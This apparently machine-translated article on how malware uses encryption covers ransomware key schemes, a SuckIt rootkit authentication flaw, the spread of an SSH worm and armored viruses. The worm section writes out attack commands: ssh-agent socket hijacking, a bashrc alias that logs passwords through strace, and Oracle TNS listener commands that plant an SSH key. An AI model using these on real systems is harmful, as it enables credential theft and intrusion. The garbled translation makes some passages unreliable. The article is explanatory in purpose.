Malware encryption (part 1)

In today's age, encryption is everywhere, from the most ordinary things like e-mail sent / received to sophisticated things like secret keys, national codes. Most users are more or less using different encryption mechanisms in familiar applications, though sometimes they don't realize it themselves. In this series of two articles, we will send you a review of two aspects of a problem: coding , it both helps us to be safer, but on the contrary, if used for malicious purposes, the level Sophisticated and dangerous becomes incalculable.

Part one will introduce some 'scientific' concepts that encode viruses with some potentially malicious examples via SuckIT rootkit and SSH worms. Then there will be some 'armored' viruses, using sophisticated deformation techniques (both content and form) to evade detection of antivirus software.

Part two looks at some of the latest viruses that try to work underground and avoid detection and analysis. Later, we will continue to discuss sophisticated armor viruses using the technique of deforming both content and form through the concept of Bradley worm, an unencrypted virus. Skype will be used as an example for application encryption with a close protocol, often used by an attacker.

Introduction to coding and viruses

The coding field is usually divided into two parts:

1. Encryption: specialized is used to build algorithms to ensure confidentiality, integrity, authentication . for data. Based on some secret types, usually related to keys and some specific math functions (like one-way math).
2. Decoding: is the reverse process of coding, building algorithms to penetrate and overcome authentication mechanisms, break integrity, confidentiality . Often based on some general mathematical theory or one Number of tricky tricks (also known as decoding operations ).

When it comes to coding people often think of its protective aspect. And decoding often involves attack, intrusion or intrusion.

In contrast, when talking about virus science, we immediately think of malicious attacks. However, this subject is also divided into two arrays, on the one hand attacking and the other protecting:

·         Virus: is a self-replicating program to spread malicious code by inserting (possibly editing) copies of itself into source code or other executable program body. In this respect, the virus is meant to attack because harmful elements are embedded in them. And because of the use of anti-anti-virus techniques (ie against anti-virus programs), they apply to them.

·         Anti-virus : is a program that performs the function of identifying, obstructing and eliminating computer viruses and other malicious software. It is primarily based on pattern matching (signs) and identification of suspicious activity (evaluation).

Encryption, used by antivirus software manufacturers to ensure confidentiality for signature databases and for automatic software updates. But it is also used by virus writers to ensure that it is hard to break for the central part of the virus, or to avoid detection and analysis of malicious code of anti-virus programs (replacing code, using use of deformation and form deformation techniques in many armored viruses).

Malware encryption (part 1) Picture 1 Science coding viruses

Write a virus program, regrettably like writing any other piece of software for a software. The authors try to put more creative, unique, dangerous ideas into the application to enhance functionality (or the ability to hide), the power, the strategies to re-create the focus. However, when an analyst captures the program, he also knows how and how it works . In the end, both people write the virus and its analyst shares the same aspects. about viruses.

Right on the title of the article, the main implication of the lesson was given by the implicit author to analyze the symmetry in this perspective. That is, having benefits will be harmful, protected, there will be attacks and symmetry will be asymmetric. It is the law of two sides of a problem that has existed for many generations. Therefore, the first definition of the science of virus encryption is: a virus embedding program and using a common key.

The basic model is considered today

This model may be considered according to the following purposes:

1. The virus writer creates an RSA key:

o   The public key appears in the body of the virus program.

o   Private key is kept by the author.

1. The virus spreads and the focus uses the public key. For example, it encrypts data (hard drive, file, e-mail .) for destinations with public keys.
2. Virus writers require owners of machines that have been compromised to install a ransom to get their private keys decrypted.

Some recent vivid examples of this method: GpCode and Krotten. But fortunately they also have some disadvantages. The first is an anonymous aspect: how does the person who wrote the virus get money if the victim doesn't know who to send? There are always greedy people who want to make money easily by intimidating others. Therefore, some users reuse a virus multiple times for many victims. What happens when a victim publishes a wide decryption key for everyone to know? In addition, virus writers have a form of asking the victim to send encrypted data to them, then they decrypt and return the victim. But that also means that the attacker is completely in possession of that data . and often the victim doesn't like that. They would rather lose data.

Combined virus coding model

Next, it is common to use a hybrid model, using both symmetric and asymmetric coding mechanisms.

1. The virus writer creates an RSA key:

o   The public key appears in the body of the virus program.

o   Private key is kept by the author.

1. Virus spread:

o   The focus part creates a secret key.

o   The secret key is used to encrypt data on the disk.

o   The secret key is encrypted with the public key.

1. Virus writers require a ransom before decrypting the secret key.

Search for destination, delay analysis and evasion

Many people will ask: 'How can coding techniques be used for virus creation? 'In order for the problem to be clearer, consider the following two questions:

1. How can I improve the element in coding?
2. How can encryption be used for malicious purposes?

To understand this striking threat, we must first understand what is commonly used. There are three important features that malware builders often use. The first is the target search , which is the mechanism used to detect suitable targets to attack and control the spread of viruses. The second goal of the virus creators is to delay the analysis , which is to find ways to delay or prevent someone from understanding the malicious code he is building. And the last important feature is hiding , that is to always try to be beyond the reach of anti-virus programs.

The problem of accuracy

As mentioned above, encryption is now used everywhere. On networks, some layer 2 protocols are built based on encryption mechanisms (WEP, WPA / TKIP .) like other higher-layer protocols (IPSec, SSH, SSL, Kerberos, PGP .). They are used for a variety of purposes, from authentication (with passwords using shared keys, exchanging keys, tokens) to encryption (with AES, DES, 3DES, IDEA, RC4 .)

However, no matter what encryption mechanism is, one thing is certain: if encryption is used at the end of a communication channel, it is also used at the end of other channels. Moreover, there is often a password or a trust relationship between these objects. And remember, encryption protocols are often complex and complex, requiring many other conditions when deployed in practice. We will explore all of these 'ingredients' when studying the science of virus coding, built for the purpose of harm.

In part one, we will analyze how a virus encoder uses encryption to find the target machine with high accuracy. This method is rated as 'taller' than some of the older worm techniques that used to be in the past (like creating some fake 32 bits as IP addresses).

About SuckIt

We won't go into all the components of the SuckIt toolkit but focus on its coding. It can be seen that the evaluation mechanism of this toolkit is inherently flawed. Anyone who finds a SuckIt binary can use it to join the network of hosts that have been compromised by SuckIt because the attacker possesses and understands what he is doing.

This is entirely possible by SuckIt authentication based on a comparison of two hash tables. We do not need to query simulated images but only hash tables are sufficient. Therefore, simply change it on the client so that it sends the hash table directly to the server without having to do anything else. This can be repeated as often as you like.

The problem is how to find the next machine to repeat? The first place to be considered is the starting direction of the attacker. It is usually a compromised host, in which he may have installed and used the client with the same password. However, attackers are human like all of us. They can't remember too many complicated passwords. Therefore, workstations used by them often have the same password as the password used on a SuckIt network. The second interesting place can find an attacker that is executed by SuckIt itself. The .sniffer file is hidden in the secret station's key section of the rootkit. And if the attacker uses a SuckIt client on the compromised workstation, it also includes traffic to other destinations, of course the hash table as well.

Build basic principles behind an SSH worm

SSH is now a well-known protocol, built on many encryption protocols and is mostly (if not all) the system administrator on the Internet to use. This protocol is built to allow administrators to log into a remote machine and execute multiple commands on it safely. There are many authentication mechanisms for clients: passwords, challenges / responses, kerberos, public encryption, and this list is still being extended. Server is identified by an asymmetric key. SSH also provides many great components such as TCP proxy, secure FTP, agents that come later .

Imagine what an attacker could use to create an SSH worm based on all those components. Of course, like all other worms, they will target vulnerabilities that can be exploited on an SSH server. That's typical, but not the only way to hack into an SSH server remotely. Worms can use a flaw, fine, but not a necessity.

Assuming the victim 0 is the host being hacked with many users in it, and our worm has the highest privilege on the host, that is, it can change its identity to impersonate all human roles. Use locally if needed. The reality is that a worm can exploit many other local vulnerabilities to gain similar privileges on new hosts and to enhance its spread. However, in our example only limited the major dispersal in SSH components and human factor errors.

The first question we need to answer is: when an attacker tries to build this worm, how does their replication form on the SSH network from a single host? The answer is two parts: first, we need to find interesting target machines; and second, we need to find a way to penetrate these target machines as an attacker did.

An SSH network can be visually illustrated with a diagram based on asymmetric encryption and reliable relationships. The buttons on the diagram are SSH hosts. The archives will lead to a remote SSH server where the user is used or connected to, and thus indicate the attacker knows the destination for the worm. The archives represent the starting point of the user's connection, on the current SSH server. That might be a destination, but worms can't be sure whether the SSH server is running. Therefore in this case, a vulnerability that can be exploited on the SSH client will be very useful for the attacker.

The intelligent OpenSSH deployment section provides all sorts of useful information for detecting remote servers (sectors). Remember that in this example we have the privilege of any local user. Therefore, taking the privilege of a user we can:

1. Know all hosts that this user knows. All these hosts have a shared key stored in the ~ / .ssh / known_hosts directory . However, to keep this information from leaking, the latest version of OpenSSH uses a hash table for IP addresses and names instead of plain text.
2. Consider the ~ / .ssh / config (if it exists) configuration file of the Host and can access the ControlPath directory.
3. See current and future network connections.
4. Exploit the history (schedule of activities that were performed): grep ssh ~ / .bash_history .

>> export SSH_AUTH_SOCK = / tmp / ssh-DEADBEEF / agent.1337
>> export SSH_AGENT_PID = 1007

Now, search the bows as defined above. First, consider the file containing the key licensed by the user: ~ / .ssh / authorized keys . Network connections should also be considered. With root privileges (the highest user role), we can also find the network and look at the log files of incoming connections.

Now, we know how to find interesting target machines correctly. And a worm like SSH also needs to spread to these destinations. As mentioned above, worms can use an SSH vulnerability on the server or client, but there are many other ways.

The easiest way is to borrow the ssh-agent agent of a user:

 >> export SSH_AUTH_SOCK = / tmp / ssh-DEADBEEF / agent.1337 

 >> export SSH_AGENT_PID = 1007 

Recently there has been another interesting component in SSH that requires an attacker to spend less effort to get results. It is possible to combine several multi-session SSH sessions into a single TCP connection. Therefore, you can log in to a remote host, all subsequent connections to the same host will be made based on previously available connections. This component can be configured by all user objects:

 ~ / .ssh / config 

 Host GetinMeForFree 

 ControlMaster auto 

 ControlPath ~/.ssh/currents/%r@%h:% p 

Therefore, if a connection to the GetinMeForFree host already exists, the worm won't need to do anything else to connect to this system.

Worms can also take advantage of users' trust in encryption to steal their 'unbreakable' passwords or passwords. Just using a keylogger software like strace is enough. For example, replace the ssh command with an alias in ~ / .bashrc :

 # new ssh command put in ~ / .bashrc 

 alias ssh = 'strace -o / tmp / sshpwd-`date' +% d% h% m% s'`.log -e 

 read, write, connect -s2048 ssh ' 

The worm will have to wait for the keys, such as:

 connect (3, sa_family = AF_INET, sin_port = htons ( 22 ), 

 sin_addr = inet_addr (" 192.168.0.103 "), 16) 

 write (5, "Password:", 9) = 9 

 read (5, " b ", 1) = 1 

 read (5, " e ", 1) = 1 

 read (5, " e ", 1) = 1 

 read (5, " r ", 1) = 1 

 read (5, "n", 1) = 1 

The same is true when you get a passphrase set in a private key, usually found in ~ / .ssh / id_ [dsa | rsa] .

Another trick has been used in previous malware: embedding a brute force password application ('coercive force'). And now, this technique is still very popular in SSH attacks. If you are viewing log files, you will probably see the following:

 Feb 9 23:25:14 localhost sshd [14236]: Failed password for root from 

 80.95.161.86 port 58645 ssh2 

 Feb 9 23:25:17 localhost sshd [14238]: Failed password for user invalid 

 admin from 80.95.161.86 port 58806 ssh2 

 Feb 9 23:25:23 localhost sshd [14313]: Failed password for user invalid 

 guest from 80.95.161.86 port 59243 ssh2 

 Feb 9 23:25:26 localhost sshd [14351]: Failed password for user sai 

 webmaster from 80.95.161.86 port 59445 ssh2 

 Feb 9 23:25:29 localhost sshd [14364]: Failed password for user invalid 

 oracle from 80.95.161.86 port 59445 ssh2 

The worm can exploit weaknesses in other applications, especially if it wipes or successfully overwrites a file to the remote machine. If the worm sends its public key to the destination's ~ / .ssh / authorized keys file , and assuming that the authentication type is already licensed, it only needs to connect to the remote host.

Web applications are the first target for this method, since most of them allow recording to a remote destination. However, in this example we will look at an old and fairly well-known vulnerability in Oracle, which seems to be the right thing for our worms.

In previous Oracle versions, there was a component called TNS Listener (TNS listener), which accepted commands and direct connections without any form of authentication. Therefore, the idea here is to connect to the listener, change the log file to ~ / .ssh / authorized keys , send a dangerous command (such as a worm key) that will be included in the new log file . And the game is over.

 >> tnscmd -h 192.168.0.103 -p 1521 --rawcmd "(DESCRIPTION = (CONNECT_DATA = (CID = 

 (PROGRAM =) (HOST =) (USER =)) (COMMAND = log_file) (ARGUMENTS = 4) (SERVICE = LISTENER) 

 (VERSION = 1) (VALUE = /home/ora92/.ssh/authorized_keys ))) " 

 >> tnscmd -h 192.168.0.103 -p 1521 --rawcmd "(CONNECT_DATA = 

 (( ssh-dss AAAAB3NzaC1kc3D . Ckuu4=raynal@poisonivy.gotham " 

Thank you for coding and its two-way mechanism. They can help attackers to easily target the destination with high accuracy. Also thanks to the users themselves. Thanks to their carelessness, it is not too difficult to attack these targets. And in combination with local vulnerabilities, the possibility of spreading an SSH worm is possible. It is necessary to encourage many users to realize this method so they can protect themselves.

The impact of the current worm is limited, since there are not really many SSH servers on the network, there are not many potential target machines. But imagine what would happen if there was a system with similar components and many, many users .

Time issue: the appearance of armored virus

Before the end of Part 1 of this series, we will introduce some sophisticated armored viruses and then repeat some important concepts to prepare for the next two.

When it comes to attack and protection, time is a very important factor. Usually coding code or data is used to protect the copyright of the software. The code and data are encrypted to prevent anyone from reading it. And only authorized users can provide decryption keys to read them in plain text. Some coding layers can include stacks, and code or data can be partially decoded at a certain time in memory. These techniques are used either to mark software or to protect copyright.

Unfortunately, similar techniques are also used in malware, and most are the same. Let's summarize the 'life' of a malware when it starts spreading.

One day, when malware was discovered, it became a hot topic, a new malicious program code for analysts. When the analysis is complete, signs and evaluations are created to allow the anti-virus software to remove the malware. Then, signs and evaluations are provided to end users through the auto-update versions of the software. New copies of malware are immediately detected and destroyed when they reach the target machine. Therefore, the final conclusion is: when malware spreads, it will be destroyed.

To avoid this 'problem', the malware writers have to maintain it, or even ban the analysis on his malicious product. A virus that uses many techniques to avoid or delay the analysis will become armored virus.

The first armored virus built on this purpose was called Whale and first appeared around September 1990. It uses a number of techniques:

1. Polymorphism: Both binaries and programs are coded (there are about 30 hard-coded encodings).
2. Stealth: There are several interrupts, including debugging versions, connected by Whale, and it hides in high memory before reducing the maximum limit of memory due to the long, hidden DOS definition. long for a certain period of time.
3. Armoring: code changes depending on the type of architecture (8088 or 8086), using extremely many confusing techniques (except code, identification conditions, residual codes .) and has one more thing called anti-debug (anti-debug, used when the debugger is detected, the keyboard will be locked and Whale will cancel).

If these techniques are now commonplace, about 16 years later, you can imagine that some malicious code will enter the lab of antivirus software manufacturers.

In part two of this article, we will learn more about encapsulated viruses with deformation techniques (both content and form). We will delve into the details of Bradley worm, a virus that cannot be analyzed. In addition, we will look at the popular Skype application and learn how an attacker used a close protocol, how a built-in encryption mechanism as a vector for attacks,

Conclusion part one

In this section, the concepts of 'virus coding science' have been defined so that we can understand how those who write virus coders often use it. We discussed two examples, one is the weakness in SuckIt rootkit and the other is the potential of a future SSH worm.

In the next part two, we will look at some of the latest viruses with sneaky techniques, to avoid detection and analysis. We will also continue to discuss viruses bound to the concept of the Bradley worm, a virus that cannot be analyzed, using virus encryption technology. Skype will be used as an example for applications that embed viruses and a close protocol that can be exploited by an attacker and manipulated on it.